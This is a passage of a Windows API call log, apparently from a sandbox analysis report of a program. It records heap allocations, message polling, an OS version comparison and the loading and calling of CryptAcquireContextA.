dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.393] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0256.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0256.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0256.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.394] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0256.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.395] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0256.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0256.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0256.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0256.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0256.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0256.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.397] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0256.397] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0256.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.397] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0256.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0256.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.398] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0256.398] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0256.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0256.398] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0256.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.401] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0256.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0256.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.403] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0256.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0256.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0256.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.404] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0256.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0256.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.405] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2698) returned 1 [0256.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 